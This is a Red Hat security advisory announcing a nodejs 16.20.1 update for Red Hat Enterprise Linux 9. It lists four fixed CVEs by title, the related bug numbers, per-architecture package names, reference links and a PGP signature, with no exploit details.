CVE Names:         CVE-2023-30581 CVE-2023-30588 CVE-2023-30589   
                   CVE-2023-30590   
=====================================================================

1. Summary:

An update for nodejs is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Node.js is a software development platform for building fast and scalable  
network applications in the JavaScript programming language.

The package has been upgraded to a later upstream version: nodejs  
(16.20.1). (BZ#2223334, BZ#2223336, BZ#2223338, BZ#2223340, BZ#2223342,  
BZ#2223344)

Security Fix(es):

* nodejs: mainModule.proto bypass experimental policy mechanism  
(CVE-2023-30581)

* nodejs: process interuption due to invalid Public Key information in x509  
certificates (CVE-2023-30588)

* nodejs: HTTP Request Smuggling via Empty headers separated by CR  
(CVE-2023-30589)

* nodejs: DiffieHellman do not generate keys after setting a private key  
(CVE-2023-30590)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2219824 - CVE-2023-30581 nodejs: mainModule.proto bypass experimental policy mechanism  
2219838 - CVE-2023-30588 nodejs: process interuption due to invalid Public Key information in x509 certificates  
2219841 - CVE-2023-30589 nodejs: HTTP Request Smuggling via Empty headers separated by CR  
2219842 - CVE-2023-30590 nodejs: DiffieHellman do not generate keys after setting a private key  
2223334 - nodejs: Rebase to the latest Nodejs 16 release [rhel-9] [rhel-9.2.0.z]  
2223344 - nodejs: npm's /usr/etc/ softlink to /etc/ is preventing osbuild from creating Edge images. [rhel-9] [rhel-9.2.0.z]

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
nodejs-16.20.1-1.el9_2.src.rpm

aarch64:  
nodejs-16.20.1-1.el9_2.aarch64.rpm  
nodejs-debuginfo-16.20.1-1.el9_2.aarch64.rpm  
nodejs-debugsource-16.20.1-1.el9_2.aarch64.rpm  
nodejs-full-i18n-16.20.1-1.el9_2.aarch64.rpm  
nodejs-libs-16.20.1-1.el9_2.aarch64.rpm  
nodejs-libs-debuginfo-16.20.1-1.el9_2.aarch64.rpm  
npm-8.19.4-1.16.20.1.1.el9_2.aarch64.rpm

noarch:  
nodejs-docs-16.20.1-1.el9_2.noarch.rpm

ppc64le:  
nodejs-16.20.1-1.el9_2.ppc64le.rpm  
nodejs-debuginfo-16.20.1-1.el9_2.ppc64le.rpm  
nodejs-debugsource-16.20.1-1.el9_2.ppc64le.rpm  
nodejs-full-i18n-16.20.1-1.el9_2.ppc64le.rpm  
nodejs-libs-16.20.1-1.el9_2.ppc64le.rpm  
nodejs-libs-debuginfo-16.20.1-1.el9_2.ppc64le.rpm  
npm-8.19.4-1.16.20.1.1.el9_2.ppc64le.rpm

s390x:  
nodejs-16.20.1-1.el9_2.s390x.rpm  
nodejs-debuginfo-16.20.1-1.el9_2.s390x.rpm  
nodejs-debugsource-16.20.1-1.el9_2.s390x.rpm  
nodejs-full-i18n-16.20.1-1.el9_2.s390x.rpm  
nodejs-libs-16.20.1-1.el9_2.s390x.rpm  
nodejs-libs-debuginfo-16.20.1-1.el9_2.s390x.rpm  
npm-8.19.4-1.16.20.1.1.el9_2.s390x.rpm

x86_64:  
nodejs-16.20.1-1.el9_2.x86_64.rpm  
nodejs-debuginfo-16.20.1-1.el9_2.i686.rpm  
nodejs-debuginfo-16.20.1-1.el9_2.x86_64.rpm  
nodejs-debugsource-16.20.1-1.el9_2.i686.rpm  
nodejs-debugsource-16.20.1-1.el9_2.x86_64.rpm  
nodejs-full-i18n-16.20.1-1.el9_2.x86_64.rpm  
nodejs-libs-16.20.1-1.el9_2.i686.rpm  
nodejs-libs-16.20.1-1.el9_2.x86_64.rpm  
nodejs-libs-debuginfo-16.20.1-1.el9_2.i686.rpm  
nodejs-libs-debuginfo-16.20.1-1.el9_2.x86_64.rpm  
npm-8.19.4-1.16.20.1.1.el9_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-30581  
https://access.redhat.com/security/cve/CVE-2023-30588  
https://access.redhat.com/security/cve/CVE-2023-30589  
https://access.redhat.com/security/cve/CVE-2023-30590  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkx8MoAAoJENzjgjWX9erENmAP+wQYcM3guk8vt1iLbWZun3nt  
vv24zXWFgnWLkER482kfYXBpKV8QczIAgRK6REOOe7titcWjTvc6eVCT6dhRrNxe  
hiAB1hW8H0wQhXMKPFB1lWYvghxVHLuLkjFoK2ITex5e/slwKBlc1tEaEf0ljr5s  
4m/a3oP2Yt/k8RZv5IR68cdRdn1fOTGya06/gMkz2OydOb6s+vxQcMtX5yOfU/Mk  
UJWU1Ey2XALRAFOuC6DIB/G7ic1+G5QGFqVuVrmXecTChncliJEFhACGo9JHa3Y4  
NkxAp6b27IXoaOX+sbRzhE2rnequ7yWHM2OBrEcs/SYqGMXrO8cbtfR5SGqn7QX7  
geCgst75yBBSlEJWHsUcZ6xRUFG3igPe7bbhbwc3AVEJFijjg2qOC0V72PLn86rt  
cUzxiuXPyiRmzdUjbrLQGUq2a+/efwvq3909UL/iWYXYWJtE9yReIS/F0eWeiS4z  
+tUlL9BPCGbvdZUZ3mNlg1lWFJTsnDAH+QmYkLYbgp49GCH9COBOeQHGy0QBN052  
NRs4Y8wJf12RFBPirI0BddCWARrFAOqV2si1nehf1J95ej/uqoKrAXALXD3e2VhU  
YRnurCXgAbqcY6+LGz1k0ucrisDXRG2PzXRWnlCx3mI4YH0BubYgA7JFjEQGtpNh  
BVkzXu4g13lrTdfATKty  
=QBcD  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Source

Packet Storm